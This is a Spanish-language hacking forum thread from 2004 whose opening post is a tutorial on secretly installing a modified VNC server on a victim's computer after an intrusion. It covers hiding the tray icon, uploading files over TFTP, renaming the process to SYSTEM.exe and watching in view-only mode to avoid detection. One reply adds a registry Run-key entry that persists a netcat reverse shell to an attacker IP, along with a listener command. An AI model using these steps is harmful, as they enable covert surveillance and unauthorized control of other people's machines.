Troyanizando VNC - Control Remoto Invisible

Iniciado por Gospel, 22 Septiembre 2004, 10:59 AM

0 Miembros y 1 Visitante están viendo este tema.

Gospel

Ya está disponible el tutorial!

Gospel.feat.Zhyzura-Troyanizando.VNC.Control.Remoto.Invisible.pdf


http://www.geocities.com/unrayodesoul/gospel/Gospel.feat.Zhyzura-Troyanizando.VNC.Control.Remoto.Invisible.pdf
(Guardar destino como...)

Mirror: http://ns2.elhacker.net/timofonica/manus/Gospel.feat.Zhyzura-Troyanizando.VNC.Control.Remoto.Invisible.zip

Mirror2: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=65

_________________________________________________________________________________

Jejejeje.... Wolaaa  ;D

He decidido escribir este pequeño manual pq me empezó a picar la curiosidad después de leer el post de Shy @ http://foro.elhacker.net/index.php/topic,41216.msg198996.html#msg198996 (Así q en parte, el mérito tb es de él  :D )

Para todos aquellos q os preguntáis (yo hasta ahora me lo preguntaba): ¿Cómo puedo obtener el escritorio remoto de la víctima a partir de una shell remota obtenida tras una intrusión?

Vamos a utilizar para ello el programa de control remoto, q no troyano, de distribución libre y gratuita VNC. La página oficial del proyecto es http://www.realvnc.com.

Este simple programa se compone de dos aplicaciones Cliente y Servidor. El Servidor es lo queremos instalar en la víctima, el Cliente es lo q utilizará el atacante para visualizar el escritorio de la víctima.
Problema: Por defecto, el Servidor VNC muestra un Tray Icon durante su ejecución. Ohhh...  :( se acabó la Fiesta??? Nooooooo, ni hablar!  >:(

He encontrado bastantes manuales por la red de cómo llevar esto acabo, pero ante todo, he preferido no jugar con claves de registro así q me quedo con este procedimiento q os voy a enseñar:

1) Instalar el original VNC en el equipo atacante.
Para ello, no vamos a bajarnos la última version oficial de VNC, si no ésta (ya veréis luego pq esta versión en concreto...)

ftp://ftp.uk.research.att.com/pub/vnc/dist/
y buscamos
vnc-3.3.2r6_x86_win32.zip

Despúes de descargarnos el zip, lo descomprimimos y lo instalamos. Se creará una carpeta en Archivos de Programa llamada C:\Archivos de programa\ORL\VNC donde encontraremos, entre otros archivos, el Servidor (WinVNC.exe) y el cliente (vncviewer.exe).

2) Configurar el Servidor en el propio equipo del atacante.
Necesitamos configurar el Servidor antes de instalárselo a la víctima o de otro modo, no podremos conectarnos remotamente!!
Así pues, ejecutamos WinVNC.exe y nos saldra una ventana de propiedades. Comprobamos q en Display Number pone 0 y en Contraseña agregamos una q queramos...
Ya podemos cerrar el Servidor.

3) Sustituir el Servidor ejecutable original por uno modificado para q no muestre el Tray Icon.
Este ejecutable lo encontraremos en http://www.ssimicro.com/~markham/vnc/vnc-3_3_2r6_x86_win32_notray.zip

Lo descargamos, lo descomprimos y sustituímos el archivo WinVNC.exe por el original q se encuentra en la carpeta C:\Archivos de programa\ORL\VNC

4) Subir el Servidor VNC a la víctima.
Después de haber obtenido una shell remota de la víctima, vamos a subir vía TFTP los archivos necesarios para poder ejecutar el Servidor VNC en el sistema de la víctima.
Para ello, colocamos en la carpeta de nuestro Servidor TFTP (si no entiendes esto de Servidor TFTP, busca por el foro...) los siguientes archivos:
WinVNC.exe y VNCHooks.dll localizados en C:\Archivos de programa\ORL\VNC
omnithread_rt.dll localizado en C:\WINDOWS\system32

Subimos estos archivos a la víctima y procedemos a iniciar la ejecución del Servidor son el comando start WinVCN.exe
Por supuesto, no aparece ningún Tray Icon en la barra de la víctima   8)

Creo q la captura q os adjunto con el texto explica bien este último paso.

5)Conectarse desde el Cliente atacante al Servidor de la víctima.
Desde el equipo atacante, ejecutamos vncviewer y antes de nada, para evitar dar el cantazo, en Opciones marcamos la casilla de View Only (inputs ignored). De esta forma no podremos interactuar con el ratón de la víctima.
Introducimos la IP de la victima : Display Number (ej: 192.168.0.2:0), la contraseña y boom!!

Un apunte, aunq no aparezca el Tray Icon, sí q aparece WinVnc.exe en la ventana de procesos de la víctima. Yo he probado a renombrar el archivo WinVNC.exe por SYSTEM.exe y me funciona sin problemas.  ;)


Tengo decir q no me he molestado mucho en buscar por el foro y es posible q esto mismo ya lo haya explicado alguien en otro hilo. Si es así, bueno, yo he aprendido mucho currándomelo por mi cuenta y aquí os dejo mi experiencia.  :-[


Salu2

Ambolius

Muy bueno Gospel, en tu linea como siempre  ;)

Chincheta temporal y agregado al post de textos y manuales.
Un informático a otro:
- ¿Cuantos eran los Dálmatas?
- 101.
- Por el culo te la hinco.


zhyzura

muy bueno gospel.  :D

seguro a mas de alguno le habras resuelto alguna duda.

solo una pequeña observacion.(se me vino a la mente a la hora de leer la parte de "troyanizar").

¿que ocurriria si la victima tiene ip dinamica?
lo mas seguro es que nosostros nos queramos conectar con el server y no lo podremos realizar ya que requerimos la ip de ese equipo  :-\.

pero para todo hay solucion  :D.

yo sujiriria subirle un netcat y realizar una reverse shell, asi seria el netcat el que se conectaria contigo y no necesitaras saber su ip.

para esto, ya una vez subido el netcat a la victima solo necesitamos agregarle una pequeña entrada al registro, pero como tenemos en estos momentos ya una shell de la victima  no sera dificil...
nos dirigimos a la shell de la victima y tecleamos:

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Netcat /t REG_SZ /d "C:\nc -d -e cmd.exe 10.10.0.156 9090"
(asi seria tomendo en cuenta que el nc esta en el directorio raiz del hdd)

ahora si se ejecutara en cada inicio de sesion...

solo que para esto funcione tendriamos que tener un netcat a la escucha en nuestra maquina y asi nos devolveria shell a la hora en que la victima conecte:

nc -l -p 9090 -d -e cmd.exe

pero ahora se atraviesa otro problema... nosotros tampoco tenemos ip estatica.
pues seria caso de ir a www.no-ip.com crearnos un dominio y listo  ;D, descargamos el ipduck para conectarnos con la misma ip y ya seremos felices xDDD.

una vez que nos devuelve la shell solo tendriamos que teclear ipconfig y listo, sabremos la ip de la victima.

espero me haya expicado bien  :P, si no... me avisan  :-[


quizas sea algo liado andar haciendo esto pero me recordo mis tiempos de troyanos xDDD

saludos

oRTNZ

Gospel, felicitaciones ya hace tiempo lo queria hacer, pero ni tiempo tengo de andar en mis huevvv, weno esta hasta donde sabia que se podia hacer era con un encriptador - - - - mas engorroso aun pues lo queria hacer con un programa que usa la microsoft ,entoncn seria casi invisible  :P,saludos : )
pD:  :P
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...

Mimiru

Que yo sepa el VNC tiene una opcion donde tb puede hacer lo mismo que el netcat siendo el servidor nosotros y la maquina "victima" la que se conecta.  Pudiendo asi saltarnos su router y quitarnos el problema de la ip dinamica (ideal para institutos y cybers).

samberocrack

a mi me quedo clarito clarito como el agua :P :P

salu2 ;D
No siempre lo bueno es facil, es el caso de LINUX para mi

jomagalo

pues yo no le veo la opcion de reverse shell al vnc ni con la version 4
Axarquia Informatica
Repuestos para Televisores

Man-In-the-Middle

#8
Consulta!!

Me bajo esta ver vnc-3.3.2r6_x86_win32.zip

lo instalo en mi mauina

configuro el server con el pass
cierro
me bajo vnc-3_3_2r6_x86_win32_notray.zip
remplazo el WinVNC.exe
, pero ahi viene mi consulta, dentro del zip de vnc-3_3_2r6_x86_win32_notray.zip
tambien vienen :
omnithread_rt.dll
VNCHooks.dll
vncviewer.exe

esos tambien los remplazo

y lo otro remplazando y no remplazando me bota el siguiente error
Ivalid vnc server specified
server should be of the form host:display

o me bota en otra oportunidad , que la mauina no tiene password

This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted

he seguido al pie de la letra todo Gospel, aver bro una mano que me interesa bastante esta opcion

Gracias
Man-In-the-Middle


Sir_Neo

aki hay algo que esconden. yo tb lo he probado y me sale lo mismo. la password no se keda almacenada. A parte que cuando lo lanzas por consola se abre la ventana de propiedades

Si juegas con el mejor, muere como los demás

http://www.lepeonline.net/